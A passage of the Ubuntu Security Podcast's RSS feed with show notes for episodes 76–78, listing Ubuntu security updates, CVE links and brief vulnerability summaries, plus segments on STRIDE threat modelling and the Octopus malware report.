<li><a href="https://ubuntu.com/security/CVE-2020-13777">CVE-2020-13777</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Rare Friday update - high priority GnuTLS vulnerability - would use an
all-zero key for encrypting TLS session ticket</li>
<li>TLS1.3 -&gt; enables a middleperson attack against resumed sessions</li>
<li>TLS1.2 -&gt; enables passive decryption of traffic to/from servers when the
client supports session tickets</li>
</ul>
<h3 id="usn-4386-1-libjpeg-turbo-vulnerability-04-19">[<a href="https://usn.ubuntu.com/4386-1/">USN-4386-1</a>] libjpeg-turbo vulnerability [04:19]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13790">CVE-2020-13790</a> <!-- raw HTML omitted --></li>
<li>Heap buffer over-read via crafted PPM file -&gt; info disclosure / crash</li>
</ul>
</li>
</ul>
<h3 id="usn-4385-1-intel-microcode-vulnerabilities-04-49">[<a href="https://usn.ubuntu.com/4385-1/">USN-4385-1</a>] Intel Microcode vulnerabilities [04:49]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-0549">CVE-2020-0549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0548">CVE-2020-0548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest Intel microarchitectural cache side-channel vulnerabilities - L1D
cache, vector registers, special registers</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SRBDS">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SRBDS</a></li>
<li>Special register buffer data sampling (SRBDS) -&gt; RDRAND, RDSEED etc -&gt;
aka CrossTalk -&gt; micro-arch buffer is shared across cores so old values
could be read by other processors</li>
<li>microcode clears buffers -&gt; performance decrease for RDRAND etc  as a
result -&gt; kernel update contains support for a kernel command-line arg to
disable this mitigation</li>
</ul>
<h3 id="usn-4387-1-linux-kernel-vulnerabilities-07-25">[<a href="https://usn.ubuntu.com/4387-1/">USN-4387-1</a>] Linux kernel vulnerabilities [07:25]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12659">CVE-2020-12659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12464">CVE-2020-12464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0067">CVE-2020-0067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3</li>
<li>Kernel command-line option to disable SRBDS mitigation</li>
<li>F2FS bounds check fail on xattrs -&gt; OOB read -&gt; info leak</li>
<li>USB scatter-gather UAF -&gt; malicious USB device -&gt; crash / RCE</li>
<li>XDP socket fail to validate userspace metadata -&gt; OOB write -&gt; requires
CAP_NET_ADMIN</li>
</ul>
<h3 id="usn-4388-1-linux-kernel-vulnerabilities-08-40">[<a href="https://usn.ubuntu.com/4388-1/">USN-4388-1</a>] Linux kernel vulnerabilities [08:40]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1749">CVE-2020-1749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12659">CVE-2020-12659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12464">CVE-2020-12464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0067">CVE-2020-0067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 gke &amp; oem</li>
</ul>
<h3 id="usn-4389-1-linux-kernel-vulnerabilities-08-54">[<a href="https://usn.ubuntu.com/4389-1/">USN-4389-1</a>] Linux kernel vulnerabilities [08:54]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10751">CVE-2020-10751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12659">CVE-2020-12659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12464">CVE-2020-12464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0067">CVE-2020-0067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4</li>
</ul>
<h3 id="usn-4390-1-linux-kernel-vulnerabilities-09-02">[<a href="https://usn.ubuntu.com/4390-1/">USN-4390-1</a>] Linux kernel vulnerabilities [09:02]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10751">CVE-2020-10751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1749">CVE-2020-1749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12464">CVE-2020-12464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0067">CVE-2020-0067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (14.04 ESM azure, 16.04 LTS - hwe, 18.04 LTS
all)</li>
<li>As above + IPsec fail to encrypt IPv6 in some conditions -&gt; info leak</li>
</ul>
<h3 id="usn-4391-1-linux-kernel-vulnerabilities-09-35">[<a href="https://usn.ubuntu.com/4391-1/">USN-4391-1</a>] Linux kernel vulnerabilities [09:35]</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10751">CVE-2020-10751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1749">CVE-2020-1749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12826">CVE-2020-12826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12769">CVE-2020-12769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12464">CVE-2020-12464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19319">CVE-2019-19319</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4</li>
</ul>
<h3 id="usn-4392-1-linux-kernel-vulnerabilities-09-46">[<a href="https://usn.ubuntu.com/4392-1/">USN-4392-1</a>] Linux kernel vulnerabilities [09:46]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12654">CVE-2020-12654</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13</li>
</ul>
<h3 id="usn-4393-1-linux-kernel-vulnerabilities-09-46">[<a href="https://usn.ubuntu.com/4393-1/">USN-4393-1</a>] Linux kernel vulnerabilities [09:46]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12654">CVE-2020-12654</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.2</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-threat-modelling-via-stride-10-12">Joe and Alex discuss Threat Modelling via STRIDE [10:12]</h3>
<ul>
<li><a href="https://en.wikipedia.org/wiki/STRIDE_(security)">https://en.wikipedia.org/wiki/STRIDE_(security)</a></li>
<li><a href="https://threatmodelingbook.com/">https://threatmodelingbook.com/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E078.mp3" length="23879380" type="audio/mpeg" /><itunes:duration>24:52</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 77
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-77/</link>
          <pubDate>Sun, 07 Jun 2020 17:39:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>ea72606e1738c23293eee0989cacd396a9cfd589449e033294b71506d765fafa1e6f5c6b16edade636cb67e24ae1aa3ec7419fe1a95aeae62e7f753b38c39ec2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 77</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP,
  Django and more, plus Joe and Alex discuss the Octopus malware infecting
  Netbeans projects.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP,
  Django and more, plus Joe and Alex discuss the Octopus malware infecting
  Netbeans projects.
  </itunes:summary>
        <description>  This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP,
  Django and more, plus Joe and Alex discuss the Octopus malware infecting
  Netbeans projects.
  </description>
        <googleplay:description>  This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP,
  Django and more, plus Joe and Alex discuss the Octopus malware infecting
  Netbeans projects.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP,
Django and more, plus Joe and Alex discuss the Octopus malware infecting
Netbeans projects.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>40 unique CVEs addressed</p>
<h3 id="usn-4374-1-unbound-vulnerabilities">[<a href="https://usn.ubuntu.com/4374-1/">USN-4374-1</a>] Unbound vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12663">CVE-2020-12663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12662">CVE-2020-12662</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NXNS attack (<a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a>) (form of DNS reflection attack)</li>
<li>Infinite loop when processing malformed answers from upstream servers -&gt;
CPU DoS</li>
</ul>
<h3 id="usn-4375-1-php-vulnerability">[<a href="https://usn.ubuntu.com/4375-1/">USN-4375-1</a>] PHP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11048">CVE-2019-11048</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via upload of files with very long names -&gt; memory allocation
failure, stop process, fail to cleanup temp file on disk -&gt; disk space
DoS</li>
</ul>
<h3 id="usn-4376-1-openssl-vulnerabilities">[<a href="https://usn.ubuntu.com/4376-1/">USN-4376-1</a>] OpenSSL vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1563">CVE-2019-1563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1551">CVE-2019-1551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1549">CVE-2019-1549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1547">CVE-2019-1547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Timing side-channel attack against ECDSA signatures -&gt; recover private
keys</li>
<li>RNG state shared between parent and child process across fork()</li>
<li>Vulnerable to padding oracle attack -&gt; decrypt traffic</li>
</ul>
<h3 id="usn-4360-4-json-c-vulnerability">[<a href="https://usn.ubuntu.com/4360-4/">USN-4360-4</a>] json-c vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12762">CVE-2020-12762</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a> -&gt; update, regression, update without fix -&gt; now properly
fixed vuln without regression</li>
</ul>
<h3 id="usn-4359-2-apt-vulnerability">[<a href="https://usn.ubuntu.com/4359-2/">USN-4359-2</a>] APT vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3810">CVE-2020-3810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a> (ar archive handling)</li>
</ul>
<h3 id="usn-4367-2-linux-kernel-regression">[<a href="https://usn.ubuntu.com/4367-2/">USN-4367-2</a>] Linux kernel regression</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12657">CVE-2020-12657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19377">CVE-2019-19377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel (<a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a>)</li>
<li><a href="https://launchpad.net/bugs/1879690">overlayfs regression</a> - caused by adding some changes for shiftfs to
special-case overlayfs - BUT in-fact was already present in overlayfs and
this just manifested it - so for now revert the shiftfs related changes
until is fixed properly in overlayfs itself</li>
</ul>
<h3 id="usn-4369-2-linux-kernel-regression">[<a href="https://usn.ubuntu.com/4369-2/">USN-4369-2</a>] Linux kernel regression</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12657">CVE-2020-12657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11668">CVE-2020-11668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11609">CVE-2020-11609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11608">CVE-2020-11608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11494">CVE-2020-11494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19769">CVE-2019-19769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19377">CVE-2019-19377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 kernel (<a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a>)</li>
<li><a href="https://launchpad.net/bugs/1879690">overlayfs regression</a> above</li>
</ul>
<h3 id="usn-4377-1-usn-4377-2-ca-certificates-update">[<a href="https://usn.ubuntu.com/4377-1/">USN-4377-1</a>, <a href="https://usn.ubuntu.com/4377-2/">USN-4377-2</a>] ca-certificates update</h3>
<ul>
<li>Affecting Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)</li>
<li>&ldquo;AddTrust Exteral Root CA&rdquo; certificate had expired - curl and other
applications would fail to connect if they found a certificate chain
which validated via this cert (even if other paths in the chain would be
valid) - removing this cert is the easiest way to fix the issue.</li>
<li>Updated the certs for 16.04 &amp; 18.04 LTS as well</li>
</ul>
<h3 id="usn-4378-1-flask-vulnerability">[<a href="https://usn.ubuntu.com/4378-1/">USN-4378-1</a>] Flask vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000656">CVE-2018-1000656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via memory exhaustion on crafted inputs</li>
</ul>
<h3 id="usn-4379-1-freerdp-vulnerabilities">[<a href="https://usn.ubuntu.com/4379-1/">USN-4379-1</a>] FreeRDP vulnerabilities</h3>
<ul>
<li>19 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13398">CVE-2020-13398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13397">CVE-2020-13397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13396">CVE-2020-13396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11526">CVE-2020-11526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11525">CVE-2020-11525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11524">CVE-2020-11524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11523">CVE-2020-11523</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11522">CVE-2020-11522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11521">CVE-2020-11521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11058">CVE-2020-11058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11049">CVE-2020-11049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11048">CVE-2020-11048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11047">CVE-2020-11047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11046">CVE-2020-11046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11045">CVE-2020-11045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11044">CVE-2020-11044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11042">CVE-2020-11042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17177">CVE-2019-17177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000852">CVE-2018-1000852</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues including, OOB write for RSA crypto handling, OOB read on
font handling, info disclosure via ability to read client memory as color
info, etc.</li>
</ul>
<h3 id="usn-4380-1-apache-ant-vulnerability">[<a href="https://usn.ubuntu.com/4380-1/">USN-4380-1</a>] Apache Ant vulnerability</h3>
<ul>
<li>1 CVEs addressed in Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1945">CVE-2020-1945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Info leak to / malicious code exec from a local user due to the use of
system-wide /tmp for several tasks (Mike Salvatore)</li>
</ul>
<h3 id="usn-4381-1-django-vulnerabilities">[<a href="https://usn.ubuntu.com/4381-1/">USN-4381-1</a>] Django vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13596">CVE-2020-13596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13254">CVE-2020-13254</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XSS via the admin ForeignKeyRawIdWidget due to failure to properly
encoded query parameters</li>
<li>Failure to properly validate memcached cache keys - could allow a remote
attacker to DoS / info leak</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-github-report-on-octopus-malware-targetting-netbeans-projects">Alex and Joe discuss Github report on Octopus malware targetting Netbeans projects</h3>
<ul>
<li><a href="https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain">https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E077.mp3" length="19725283" type="audio/mpeg" /><itunes:duration>20:32</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 76
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-76/</link>
          <pubDate>Thu, 28 May 2020 15:10:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f530bc001e1a19da05704edc11fa374eab6f2240eb97d49bb7c946987b00bbb1ae350d078e7d7caf100c9144d8c1fdeb0c853959ce3293a2e8ce92e9b32ec4c5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 76</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we welcome back Vineetha Kamath, Ubuntu Security Certifications
  Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS
  and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel
  and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we welcome back Vineetha Kamath, Ubuntu Security Certifications
  Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS
  and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel
  and more.
  </itunes:summary>
        <description>  This week we welcome back Vineetha Kamath, Ubuntu Security Certifications
  Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS
  and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel
  and more.
  </description>
        <googleplay:description>  This week we welcome back Vineetha Kamath, Ubuntu Security Certifications
  Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS
  and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel
  and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we welcome back Vineetha Kamath, Ubuntu Security Certifications
Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS
and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel
and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4365-2-bind-vulnerabilities-00-37">[<a href="https://usn.ubuntu.com/4365-2/">USN-4365-2</a>] Bind vulnerabilities [00:37]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8617">CVE-2020-8617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8616">CVE-2020-8616</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a> - <a href="https://nxnsattack.com">https://nxnsattack.com</a></li>
</ul>
<h3 id="usn-4369-1-linux-kernel-vulnerabilities-01-11">[<a href="https://usn.ubuntu.com/4369-1/">USN-4369-1</a>] Linux kernel vulnerabilities [01:11]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12657">CVE-2020-12657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11668">CVE-2020-11668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11609">CVE-2020-11609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11608">CVE-2020-11608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11565">CVE-2020-11565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11494">CVE-2020-11494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19769">CVE-2019-19769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19377">CVE-2019-19377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 (19.10, 18.04 LTS HWE)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-75/">Episode 75</a> for details</li>
</ul>
<h3 id="usn-4370-1-usn-4370-2-clamav-vulnerabilities-01-35">[<a href="https://usn.ubuntu.com/4370-1/">USN-4370-1</a>, <a href="https://usn.ubuntu.com/4370-2/">USN-4370-2</a>] ClamAV vulnerabilities [01:35]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3341">CVE-2020-3341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3327">CVE-2020-3327</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack and heap buffer over-reads in the PDF and ARJ (Archived by Rober
Jung) file parsers -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-4371-1-libvirt-vulnerabilities-02-36">[<a href="https://usn.ubuntu.com/4371-1/">USN-4371-1</a>] libvirt vulnerabilities [02:36]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12430">CVE-2020-12430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10703">CVE-2020-10703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory leak able to be triggered by local users with read-only qemu
access when retrieving domain stats -&gt; DoS</li>
</ul>
<h3 id="usn-4372-1-qemu-vulnerabilities-03-08">[<a href="https://usn.ubuntu.com/4372-1/">USN-4372-1</a>] QEMU vulnerabilities [03:08]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1983">CVE-2020-1983</a> <!-- raw HTML omitted --></li>
